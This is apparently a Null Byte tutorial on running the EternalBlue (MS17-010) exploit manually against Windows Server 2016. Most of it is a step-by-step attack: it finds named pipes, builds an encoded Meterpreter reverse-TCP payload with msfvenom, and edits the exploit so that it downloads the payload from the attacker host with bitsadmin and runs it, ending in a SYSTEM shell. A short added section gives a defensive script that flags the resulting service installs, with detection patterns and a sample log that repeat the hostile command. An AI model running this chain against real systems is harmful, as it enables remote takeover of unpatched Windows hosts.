
Manual Utilization of EternalBlue on Windows Server with MS17-010 Python Exploit «Null Byte :: WonderHowTo



EternalBlue was a devastating attack against Microsoft's implementation of the SMB protocol. Metasploit contains a module that exploits a vulnerable target automatically. But what if we wanted to exploit this vulnerability without Metasploit holding our hand? With a Python exploit script, EternalBlue can be run manually.

I'm not going to go into the details of what EternalBlue is, where the exploit came from, or how SMB works, as I already covered that in the previous tutorial, Using EternalBlue on Windows Server with Metasploit. If you want more background on EternalBlue and SMB, and on how to determine whether a target is vulnerable, read that first before proceeding.

In this guide we tackle the manual way of using EternalBlue on Windows Server. I am using an unpatched copy of Windows Server 2016 Datacenter as the target; evaluation copies can be downloaded from Microsoft if you want to follow along.

Step 1: Setting Up the Python-based Software Exploit

First we need to find the exploit file. On Kali we can use searchsploit in the terminal to search the database for a hit.

  searchsploit eternalblue
  ------------------------------------------------------------------------------------------------------------- ----------------------------------------
   Exploit Title                                                                                               |  Path
                                                                                                               | (/usr/share/exploitdb/)
  ------------------------------------------------------------------------------------------------------------- ----------------------------------------
  Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                     | exploits/windows/remote/42031.py
  Microsoft Windows Windows 7/8.1/2008 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)         | exploits/windows/remote/42315.py
  Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)           | exploits/windows_x86-64/remote/42030.py
  ------------------------------------------------------------------------------------------------------------- ----------------------------------------
  Shellcodes: No Result
  ------------------------------------------------------------------------------------------------------------- ----------------------------------------
   Paper Title                                                                                                 |  Path
                                                                                                               | (/usr/share/exploitdb-papers/)
  ------------------------------------------------------------------------------------------------------------- ----------------------------------------
  How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008                                                | docs/german/41896-how-to-exploit-eternal-blue...
  How to Exploit ETERNALBLUE on Windows Server 2012 R2                                                         | docs/german/42280-how-to-exploit-eternalblue-...
  [Spanish] How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7/2008                                      | docs/spanish/41897-[spanish]-how-to-exploit-et...
  [Spanish] How to Exploit ETERNALBLUE on Windows Server 2012 R2                                               | docs/spanish/42281-[spanish]-how-to-exploit-et...
  ------------------------------------------------------------------------------------------------------------- ----------------------------------------

The desired exploit is labeled 42315.py . To keep things in order, we create a directory from which to work.

  mkdir exploit 

Now we can copy the exploit file into our newly created directory.

  cp /usr/share/exploitdb/exploits/windows/remote/42315.py /root/exploit/

Then change into the directory and verify that the file is there.

  cd exploit/
  ls
  42315.py

Now we can look at the source code for more information about this exploit. This is a fairly long file, so we can use the command less to display it from the top.

  less 42315.py
  #!/usr/bin/python
  from impacket import smb, smbconnection
  from mysmb import MySMB
  from struct import pack, unpack, unpack_from
  import sys
  import socket
  import time

  '''
  MS17-010 exploit for Windows 2000 and later by sleepya

  EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py

  Note:
  - The exploit should never crash a target (chance should be nearly 0%)
  - The exploit uses the same bug as EternalRomance and EternalSynergy, so a named pipe is needed

  Tested on:
  - Windows 2016 x64
  - Windows 10 Pro Build 10240 x64
  - Windows 2012 R2 x64
  - Windows 8.1 x64
  - Windows 2008 R2 SP1 x64
  - Windows 7 SP1 x64
  - Windows 2008 SP1 x64
  - Windows 2003 R2 SP2 x64
  - Windows XP SP2 x64
  - Windows 8.1 x86
  - Windows 7 SP1 x86
  - Windows 2008 SP1 x86
  - Windows 2003 SP2 x86
  - Windows XP SP3 x86
  - Windows 2000 SP4 x86
  '''

  USERNAME = ''
  PASSWORD = ''

  '''
  A transaction with empty setup:
  - it is allocated from paged pool (same as other transaction types) on Windows 7 and later
  - it is allocated from private heap (RtlAllocateHeap()) with nothing else using it on Windows Vista and earlier
  - no lookaside or caching method for allocation

  Note: method name is from NSA eternalromance

  For Windows 7 and later, it is good to use the matched pair method (one is a large pool and the other fits
  the freed pool from the large pool). Additionally, the exploit does an information leak to verify transaction
  alignment before doing the OOB write. So this exploit should never crash a target on Windows 7 and later.

  ...

This exploit requires a valid named pipe (we'll get to that shortly) and a valid set of credentials. These can be the credentials of any user who has logged on to the target in the past, including guest accounts. When the exploit runs, it automatically escalates the session to a privileged (SYSTEM) account.

Before proceeding, it is a good idea to make a copy of this file so the original source code stays intact. We can name the copy exploit.py to keep it simple.

  cp 42315.py exploit.py
ls 
  42315.py exploit.py 

Now we can edit the Python file and enter a valid username and password.

  Tested on:
  - Windows 2016 x64
  - Windows 10 Pro Build 10240 x64
  - Windows 2012 R2 x64
  - Windows 8.1 x64
  - Windows 2008 R2 SP1 x64
  - Windows 7 SP1 x64
  - Windows 2008 SP1 x64
  - Windows 2003 R2 SP2 x64
  - Windows XP SP2 x64
  - Windows 8.1 x86
  - Windows 7 SP1 x86
  - Windows 2008 SP1 x86
  - Windows 2003 SP2 x86
  - Windows XP SP3 x86
  - Windows 2000 SP4 x86
  '''

  USERNAME = 'user'
  PASSWORD = 'Password'

  '''
  A transaction with empty setup:
  - it is allocated from paged pool (same as other transaction types) on Windows 7 and later
  - it is allocated from private heap (RtlAllocateHeap()) with nothing else using it on Windows Vista and earlier
  - no lookaside or caching method for allocation

Save it, and now we can try to execute the exploit.

  python exploit.py
  Traceback (most recent call last):
    File "exploit.py", line 3, in <module>
      from mysmb import MySMB
  ImportError: No module named mysmb

The script imports a module named mysmb, which is not present on our system, so we need to download it first. wget does the job.

  wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
  --2019-03-26 11:25:44--  https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
  Auflösen von raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.148.133
  Verbindung zu raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443 ... hergestellt.
  HTTP-Anfrage gesendet, wartet auf Antwort ... 200 OK
  Länge: 16669 (16K) [text/plain]
  Save as: "mysmb.py"

  mysmb.py      100%[=====================================================================>]  16.28K  --.-KB/s    in 0.03s

  2019-03-26 11:25:44 (528 KB/s) - 'mysmb.py' saved [16669/16669]

Run the file again and we get different output.

  python exploit.py
  exploit.py <ip> [pipe_name]

This now looks like usage information, which is a good sign. We have to pass the IP address of our target and a pipe name as parameters.

Step 2: Find a Named Pipe

Named pipes are a lightweight way for running processes to communicate with one another. Pipes usually appear as files to which other processes can attach. Metasploit has a scanner that finds named pipes on a host. In a new terminal, enter msfconsole to fire it up, then search for the scanner.

  msfconsole
  search pipe
  Matching Modules
  ================

     Name                                            Disclosure Date  Rank       Check  Description
     ----                                            ---------------  ----       -----  -----------
     auxiliary/admin/db2/db2rcmd                     2004-03-04       normal     No     IBM DB2 db2rcmd.exe Command Execution Vulnerability
     auxiliary/admin/smb/ms17_010_command            2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
     auxiliary/dos/http/nodejs_pipelining            2013-10-18       normal     Yes    Node.js HTTP Pipelining Denial of Service
     auxiliary/dos/windows/smb/ms06_063_trans                         normal     No     Microsoft SRV.SYS Pipe Transaction No Null
     auxiliary/dos/windows/smb/rras_vls_null_deref   2006-06-14       normal     No     Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
     auxiliary/fuzzers/smb/smb_create_pipe                            normal     No     SMB Create Pipe Request Fuzzer
     auxiliary/fuzzers/smb/smb_create_pipe_corrupt                    normal     No     SMB Create Pipe Request Corruption
     auxiliary/scanner/smb/pipe_auditor                               normal     Yes    SMB Session Pipe Auditor
     auxiliary/scanner/smb/pipe_dcerpc_auditor                        normal     Yes    SMB Session Pipe DCERPC Auditor
     exploit/linux/misc/accellion_fta_mpipe2         2011-02-07       excellent  No     Accellion FTA MPIPE2 Command Execution
     exploit/linux/samba/is_known_pipename           2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
     exploit/multi/http/mediawiki_syntaxhighlight    2017-04-06       good       Yes    MediaWiki SyntaxHighlight extension option injection vulnerability
     exploit/multi/svn/svnserve_date                 2004-05-19       average    No     Subversion Date Svnserve

  ...

The one we want is pipe_auditor. Load the module with the use command.

  use auxiliary/scanner/smb/pipe_auditor

Now we can look at the options.

  options
  Module options (auxiliary/scanner/smb/pipe_auditor):

     Name         Current Setting                                                  Required  Description
     ----         ---------------                                                  --------  -----------
     NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
     RHOSTS                                                                        yes       The target address range or CIDR identifier
     SMBDomain    .                                                                no        The Windows domain to use for authentication
     SMBPass                                                                       no        The password for the specified username
     SMBUser                                                                       no        The username to authenticate as
     THREADS      1                                                                yes       The number of concurrent threads

All we really need to do is specify the IP address of our target.

  set rhosts 10.10.0.100
  rhosts => 10.10.0.100

And then we can run the scanner.

  run
  [+] 10.10.0.100:445 - Pipes: \netlogon, \lsarpc, \samr
  [*] 10.10.0.100: - Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

It looks like it has found some named pipes. Awesome.

Step 3: Run the Exploit File

Now we should be able to run the exploit file. Back in the first terminal from Step 1, where we are still in the exploit directory, pass the IP address of the target and one of the named pipes we found as parameters.

  python exploit.py 10.10.0.100 netlogon
  Target OS: Windows Server 2016 Standard Evaluation 14393
  Target is 64 bit
  Got frag size: 0x20
  GROOM_POOL_SIZE: 0x5030
  BRIDE_TRANS_SIZE: 0xf90
  CONNECTION: 0xffff928c5dc1e020
  SESSION: 0xffffac016815e210
  FLINK: 0xffffac0167062098
  InParam: 0xffffac016705c16c
  MID: 0x3303
  success controlling groom transaction
  modify trans1 struct for arbitrary read/write
  make this SMB session to be SYSTEM
  overwriting session security context
  creating file c:\pwned.txt on the target
  Done

Some data is spewed out on the screen, and at the end a text file is created on the target. Taking a look at the target confirms that it was successful.

However, we want to create more than just a text file on the target. This is just proof of the concept, so we still need to do a few things to make this exploit fully functional.

Step 4: Serve the Payload

We need a payload, and a way for the exploit to fetch and execute it. For this we can use MSFvenom to generate the shellcode, and serve it from Apache on our machine.

In a new terminal, use the following command to generate the payload and save it to a file named sc.exe in the default web root of the Apache server.

  msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=10.10.0.1 lport=4321 -e x64/xor -i 5 -f exe -o /var/www/html/sc.exe
  Found 1 compatible encoders
  Attempting to encode payload with 5 iterations of x64/xor
  x64/xor succeeded with size 551 (iteration=0)
  x64/xor succeeded with size 591 (iteration=1)
  x64/xor succeeded with size 631 (iteration=2)
  x64/xor succeeded with size 671 (iteration=3)
  x64/xor succeeded with size 711 (iteration=4)
  x64/xor chosen with final size 711
  Payload size: 711 bytes
  Final size of exe file: 7168 bytes
  Saved as: /var/www/html/sc.exe

This is a long command, so let's break it down:

- The -a flag specifies the architecture as 64-bit.
- The --platform option sets the platform to Windows.
- The -p flag specifies the payload.
- lhost is the address of our local machine.
- lport is the local port the target will connect back to.
- The -e flag specifies the encoder to use.
- The -i flag sets the number of iterations the encoder runs.
- The -f flag sets the output format.
- The -o flag specifies the output file.

Now we can start the Apache server so that the target can reach the payload on our machine once the exploit runs. Next, we adapt the exploit code to our needs.

  service apache2 start

Step 5: Modify the Code

Back in exploit.py, find the section near the bottom that looks like this:

  def smb_pwn(conn, arch):
      smbConn = conn.get_smbconnection()

      print('creating file c:\\pwned.txt on the target')
      tid2 = smbConn.connectTree('C$')
      fid2 = smbConn.createFile(tid2, '/pwned.txt')
      smbConn.closeFile(tid2, fid2)
      smbConn.disconnectTree(tid2)

      #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
      #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
      # Note: there are many methods to get a shell over the SMB admin session
      # a simple method to get a shell (but easily detected by AV) is
      # executing a binary generated by "msfvenom -f exe-service ..."

  def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
      with open(localSrc, 'rb') as fp:
          smbConn.putFile(remoteDrive + '$', remotePath, fp.read)

This is the code responsible for connecting to the target and creating the text file. We can also see an interesting function called service_exec(), which is commented out. It connects to the target and issues a command that copies the previously created text file to a new file named pwned_exec.txt on the C drive. We can use this function to pull our payload onto the target.

First, uncomment the function call and replace everything after cmd /c with the following command:

  bitsadmin /transfer pwn /download http://10.10.0.1/sc.exe C:\sc.exe

BITSAdmin is a Windows command-line tool used to upload or download files. The /transfer switch starts a transfer job (named pwn in this case) and /download indicates that it is a download. Then we give the name of the remote file (hosted on our machine) and the local path the file should have once it is transferred.

Add another service_exec() call to run the file we just transferred. The code looks like this:

  service_exec(conn, r'cmd /c C:\sc.exe')

Finally, we can comment out the section that creates the text file, since we no longer need it. The finished code looks like this:

  def smb_pwn(conn, arch):
      smbConn = conn.get_smbconnection()

      #print('creating file c:\\pwned.txt on the target')
      #tid2 = smbConn.connectTree('C$')
      #fid2 = smbConn.createFile(tid2, '/pwned.txt')
      #smbConn.closeFile(tid2, fid2)
      #smbConn.disconnectTree(tid2)

      #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
      service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download http://10.10.0.1/sc.exe C:\sc.exe')
      service_exec(conn, r'cmd /c C:\sc.exe')
      # Note: there are many methods to get a shell over the SMB admin session
      # a simple method to get a shell (but easily detected by AV) is
      # executing a binary generated by "msfvenom -f exe-service ..."

  def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
      with open(localSrc, 'rb') as fp:
          smbConn.putFile(remoteDrive + '$', remotePath, fp.read)

    Now all we have to do is run the exploit.

Step 6: Execute the Finished Exploit

To complete the exploit we need something to catch the shell once the payload executes. For this we can use the multi/handler in Metasploit. In a new terminal, use the following commands:

  msfconsole
  use exploit/multi/handler

The exploit(multi/handler) prompt should appear. All we have to do is set the payload to match what we specified when we created the shellcode, which in this case is a reverse TCP Meterpreter:

  set payload windows/x64/meterpreter/reverse_tcp

Next, set the appropriate listening host.

  set lhost 10.10.0.1
  lhost => 10.10.0.1

And the listening port.

  set lport 4321
  lport => 4321

Then we can start the handler.

  run
  [*] Started reverse TCP handler on 10.10.0.1:4321

It now listens for incoming connections, and if everything runs smoothly once our exploit completes, it will hand us a Meterpreter session. We should now have everything ready to go, and can launch the exploit exactly as we did in our test run, from the exploit directory.

  python exploit.py 10.10.0.100 netlogon
  Target OS: Windows Server 2016 Standard Evaluation 14393
  Target is 64 bit
  Got frag size: 0x20
  GROOM_POOL_SIZE: 0x5030
  BRIDE_TRANS_SIZE: 0xf90
  CONNECTION: 0xffff928c5dc48020
  SESSION: 0xffffac0165773250
  FLINK: 0xffffac0167056098
  InParam: 0xffffac016705016c
  MID: 0x2a07
  success controlling groom transaction
  modify trans1 struct for arbitrary read/write
  make this SMB session to be SYSTEM
  overwriting session security context
  Opening SVCManager on 10.10.0.100.....
  Creating service Jepa.....
  Starting service Jepa.....
  SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
  Removing service Jepa.....
  Opening SVCManager on 10.10.0.100.....
  Creating service YTXT.....
  Starting service YTXT.....
  The NETBIOS connection with the remote host timed out.
  Removing service YTXT.....
  ServiceExec Error on: 10.10.0.100
  nca_s_proto_error
  Done

This time the output looks different. Ignore the errors, and try again if it does not work the first time. Once the exploit completes successfully, a new session should open in our listener.

  [*] Sending stage (206403 bytes) to 10.10.0.100
  [*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.100:51057) at 2019-03-26 11:49:38 -0500

  meterpreter >

    We can confirm that we have compromised the target with the command sysinfo .

  sysinfo
  Computer        : DC01
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : DLAB
  Logged On Users : 4
  Meterpreter     : x64/windows

    And the command getuid .

  getuid
  Server username: NT AUTHORITY\SYSTEM
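Seen from the defender's side, the modified smb_pwn() from Step 5 leaves a clear trace: each service_exec() call installs and starts a Windows service on the target (the randomly named Jepa and YTXT in the output above), one whose command is the bitsadmin download and one that runs the dropped C:\sc.exe, and every service install is recorded by the Service Control Manager as System log event 7045. The triage script below is an added example, not code from the article or from the exploit's author; it scores such records over a constructed sample log. The flattened key=value layout of the sample lines is an assumption of this example, while the field names are the ones a 7045 record carries (ServiceName, ImagePath, StartType, AccountName).

```python
import re

# Heuristics for Service Control Manager event 7045 ("A service was installed
# in the system"), which fires for each service the walkthrough's exploit creates.

# image path that is a cmd.exe one-liner rather than a real service binary
SHELL_IMAGE = re.compile(r'^(?:%COMSPEC%|cmd(?:\.exe)?)\s+/[cq]', re.IGNORECASE)
# bitsadmin used as a downloader, as in the walkthrough's service_exec() command
BITS_DOWNLOAD = re.compile(r'bitsadmin\b.*?/transfer\b.*?/download\b.*?https?://',
                           re.IGNORECASE | re.DOTALL)
# short random-looking names like the Jepa and YTXT seen in the Step 6 output
RANDOM_NAME = re.compile(r'^[A-Za-z]{4}$')


def parse_record(line):
    """Parse one flattened 'key=value key2="quoted value"' record into a dict.
    The flattened layout is an assumption of this example; the keys are the
    7045 EventData field names (ServiceName, ImagePath, StartType, AccountName)."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def score_service_install(rec):
    """Return (score, reasons) for one record; anything but a 7045 scores 0."""
    if rec.get('EventID') != '7045':
        return 0, []
    image = rec.get('ImagePath', '')
    reasons = []
    if BITS_DOWNLOAD.search(image):
        reasons.append('bitsadmin download in service image path')
    if SHELL_IMAGE.match(image):
        reasons.append('service image is a cmd.exe one-liner, not a binary')
    if RANDOM_NAME.match(rec.get('ServiceName', '')):
        reasons.append('four-letter random-looking service name')
    if reasons and rec.get('AccountName') == 'LocalSystem':
        reasons.append('runs as LocalSystem')
    return len(reasons), reasons


def triage(lines):
    """Return (score, service name, reasons) for suspicious installs, worst first.
    A single weak signal on its own (e.g. only a short name) is not reported."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        score, reasons = score_service_install(rec)
        if score >= 2:
            hits.append((score, rec.get('ServiceName'), reasons))
    return sorted(hits, reverse=True)


# CONSTRUCTED sample log: the two services the modified exploit creates, a benign
# install for contrast, and a non-7045 service event that must be ignored.
SAMPLE_LOG = [
    'EventID=7045 ServiceName=Jepa ImagePath="cmd /c bitsadmin /transfer pwn '
    '/download http://10.10.0.1/sc.exe C:\\sc.exe" StartType="demand start" '
    'AccountName=LocalSystem',
    'EventID=7045 ServiceName=YTXT ImagePath="cmd /c C:\\sc.exe" '
    'StartType="demand start" AccountName=LocalSystem',
    'EventID=7045 ServiceName=Spooler ImagePath="C:\\Windows\\System32\\spoolsv.exe" '
    'StartType="auto start" AccountName=LocalSystem',
    'EventID=7036 ServiceName=Jepa State=running',
]
```

Running triage(SAMPLE_LOG) reports Jepa (four signals) ahead of YTXT (three) and drops the Spooler install and the 7036 state-change event.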

    Summary

This tutorial showed how to use EternalBlue manually against Windows Server. We first set up a few things to get the proof of concept working. Next, we generated shellcode and hosted the payload on our machine. After that, we modified the code, ran the exploit, and obtained a Meterpreter session on the target. Although Metasploit includes a module that does all of this automatically, it is worth knowing how to do things the hard way, in case something needs to be adjusted for a specific target or scenario.

Cover image via Pixabay/Pexels; screenshots by drd_/Null Byte
